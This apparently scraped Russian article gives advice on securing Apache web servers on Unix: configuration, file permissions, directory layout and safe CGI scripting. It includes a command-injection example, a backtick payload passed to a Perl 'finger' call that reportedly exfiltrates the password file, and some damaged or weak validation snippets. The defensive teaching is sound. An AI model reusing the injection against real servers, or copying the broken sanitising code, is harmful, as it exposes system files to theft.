Статья

Статья Некоторые аспекты безопасности Веб-серверов на Unix платформах

Работа добавлена на сайт bukvasha.net: 2015-10-29

Поможем написать учебную работу

Если у вас возникли сложности с курсовой, контрольной, дипломной, рефератом, отчетом по практике, научно-исследовательской и любой другой работой - мы готовы помочь.

Предоплата всего

от 25%

Подписываем

договор

Выберите тип работы:

Скидка 25% при заказе до 28.1.2025



Некоторые аспекты безопасности Веб-серверов на Unix платформах

Андрей Новиков

Предисловие

Защищенность компьютера, на котором работает Веб-сервер, и данных, находящихся на этом компьютере, зависит от многих аспектов. Основными из них являются:

Корректность настройки Веб-сервера.

Корректность построения дерева файловой системы.

Корректность установки прав доступа к файлам Веб-сервера.

Правильное написание CGI сценариев и программ.

Рассмотрим их по очереди.

Корректность настройки Веб-сервера

На безопасность работы Веб-сервера влияют некоторые настройки, устанавливаемые вами в файлах конфигурации. Я буду говорить в основном о сервере Apache, хотя все замечания в равной степени применимы и к другим серверам.

Прежде всего вам необходимо правильно выбрать пользователя, под которым будет работать Веб-сервер. Дело в том, что в Unix для того, чтобы подсоединиться к 80 порту, по умолчанию используемому в HTTP протоколе, Веб-серверу необходимо иметь права пользователя root. Но отвечать на запросы пользователей с такими правами очень не безопасно. Поэтому Веб-сервер порождает детей с правами другого пользователя, которые и обрабатывают запросы пользователей. В файле конфигурации (http.conf) необходимо указать имя пользователя, под которым будут запускаться дочерние процессы, и группу, к которой он принадлежит. В сервере Apache за это отвечают директивы User и Group.

Необходимо создать отдельного пользователя и группу, например apache и webstuff. Нельзя использовать предлагаемые по умолчанию nobody:nogroup - на некоторых системах это открывает "дыры" в защите. Ни в коем случае также нельзя запускать Веб-сервер из под пользователя webadmin, который обычно занимается всем этим хозяйством, т.к. он имеет права записи во все файлы (см. установку прав доступа к файлам). Обязательно запретите login для созданного вами пользователя.

Очень важным моментом в настройке Веб-сервера является настройка файла прав доступа (access.conf). Необходимо начать с корня дерева документов сервера и при необходимости конкретизировать установки ниже по дереву для отдельных подкаталогов. На мой взгляд более надежно использовать директиву , а не , т.к. она защищает конкретные наборы файлов, независимо от того, как вы к ним попали (ведь в серверах под Unix можно очень эффективно пользоваться линками к файлам и директориям, делая логическую структуру дерева документов более удобной). Если вы используете Alias, очень внимательно проанализируйте все возможные варианты построения логического дерева (пути к файлу).

С самого начала отмените директиву построения индексов (Option Indexes). Если вдруг пропадет файл index.html в каком-либо каталоге, сервер не построит список всех файлов в каталоге. Такой список в некоторых случаях может содержать нежелательные служебные файлы, которые пользователь не должен видеть. Обладание им открывает еще одну потенциальную "дыру". Несмотря на запрет индексирования помещайте в каждый каталог файл index.html хотя бы с пустым (это уже паранойя, но все же...).

Разрешайте серверу следовать символьным ссылкам только если вы действительно ими пользуетесь.

Для каталога /cgi-bin запретите все кроме ExecCGI. Проверьте, что скажет ваш сервер, если вы запросите http://www.server.dom/cgi-bin/. Он должен послать вас очень далеко, а не выдать список всех ваших сценариев!

Все служебные URL, такие как /server-status, /server-conf, должны быть открыты только для вашего доступа. При этом указывайте ваш IP адрес, а не hostname, т.к. hostname можно подделать, а IP адрес намного сложнее.

Корректность построения дерева файловой системы

Важно заранее очень хорошо продумать структуру каталогов. Ведь они отражают структуру вашего узла и менять потом все очень сложно. Учитывайте, что количество документов по одной теме будет все время расти. В каталоге не должно быть слишком много файлов. Это затрудняет их поиск, вы можете по ошибке что-то удалить, да и просто усложняет вам работу.

Очень важно, чтобы каталог с настройками, каталог с файлами регистрации (logs) и каталог со сценариями находились выше дерева документов. Доступ к каталогу сценариев должен осуществляться директивой ScriptAlias. Рекомендуется такая структура:

site_____conf

|__logs

|__cgi-bin

|__htdocs

Очень аккуратно пользуйтесь связями, ведущими вне дерева документов. Старайтесь ссылаться только на отдельные файлы, а не на целые каталоги. Но если это нужно, то можно.

Корректность установки прав доступа к файлам Веб-сервера

Все файлы ниже каталога site не должны принадлежать пользователю, под которым работает сервер (apache), но должны принадлежать группе, в которую входит это пользователь (webstuff).

Обычно файлами владеет webadmin, также принадлежащий группе webstuff. Все каталоги и файлы должны создаваться с umask = 027, т.е. группа (читай - Веб-сервер) должна иметь только права на чтение и исполнение, а все остальные (не webadmin) не должны иметь никаких прав. Таким образом вам останется охранять только login root'а и webadmin'а.

Правильное написание CGI сценариев и программ

Одним из основных способов попасть в Ваш сервер, это воспользоваться неправильно написанным сценарием. Существует большое количество книг по безопасным сценариям. Я опишу только основные моменты.

Первым способом нарушить работу сценария является переполнение буфера ввода. Никогда не указывайте размер буфера исходя из разумных соображений. Определяйте его динамически:

read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});

Неплохо также перед этим проверить $ENV{'CONTENT_LENGTH'} и уменьшить ее до некоего разумного предела.

Вторым важным моментом является внедрение команд ОС в возвращаемые сценарию переменные. Возьмем пример:

Пусть у на в сценарии будет строка (@usernames - массив имен)

system "finger @usernames 2>&1";

Если мы вызовем такой сценарий строкой http://www.yoursite.ru/cgi-bin/bad_finger.pl?andy+bob

то все будет замечательно. Но, если его вызвать строкой http://www.yoursite.ru/cgi-bin/bad_finger.pl?`[email protected]+ то ваш файл паролей улетит к "нехорошим парням".

В связи с этим только в крайних случаях используйте такие команды, как system(), exec() и eval(). Всегда проверяйте значения переменных на наличие метасимволов и удаляйте их. Например так:

$value =~ tr/'"\t\n\r\/<>|;//d;

$value =~ s///g;

Ну а самым надежным способом является проверка каждого поля на точный шаблон данных, которые вы ожидаете получить. Например, если вы запросили почтовый индекс, проверьте его строкой:

$zip =~ /^\d{6}$/

а если запросили адрес электронной почты, строкой:

$email=~s#(\w+(-|\.|))+@(\w+(-|\.|))+(ru|su|be|ca|cz|ee|fi)##io;

Заключение

Следуя этим нехитрым правилам вы значительно обезопасите ваш сервер от поползновений "нехороших парней", как их мило называют в зарубежной литературе. Главное, это помнить основной принцип обеспечения безопасности - запретите ВСЕ, а потом разрешайте только то, что Вам ДЕЙСТВИТЕЛЬНО необходимо.

Список литературы

Для подготовки данной работы были использованы материалы с сайта http://elib.albertina.ru/



1. Реферат Швинд, Мориц фон
2. Реферат на тему Hedda Gabbler Essay Research Paper A Craving
3. Реферат Первые теоретические системы.
4. Контрольная работа Культура управління на прикладі підприємства Житомирський облавтодор
5. Реферат на тему Philosophy The Second Coming Relations Between Science
6. Статья Применение указателей в C
7. Курсовая Исследование электровакуумного триода в рамках виртуального эксперимента
8. Реферат Теоретические сведения о функциях
9. Статья Кто такая кузькина мать
10. Доклад на тему Сжатие информации